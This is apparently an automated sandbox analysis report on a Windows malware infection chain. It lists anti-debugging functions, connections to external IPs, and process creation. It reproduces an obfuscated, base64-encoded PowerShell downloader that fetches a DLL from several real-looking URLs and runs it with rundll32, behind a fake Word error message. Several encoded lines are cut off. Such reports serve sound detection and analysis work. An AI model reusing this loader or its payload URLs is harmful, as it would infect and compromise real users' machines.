Source: rundll32.exe, 00000007.00000002.2115892691.00000000003BB000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001180 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,GetCurrentProcess,VirtualAllocExNuma,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,WriteFileGather,VirtualAlloc,SetLastError,MessageBoxA, 7_2_10001180
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10002D21
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100099ED LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_100099ED
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020166C mov eax, dword ptr fs:[00000030h] 7_2_0020166C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E166C mov eax, dword ptr fs:[00000030h] 8_2_002E166C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100026F0 SetLastError,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 7_2_100026F0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10002D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003D44 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10003D44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A303 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 7_2_1000A303

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 197.87.160.216 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 78.188.225.105 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 50.116.111.59 144 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2') Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu',RunDLL Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwA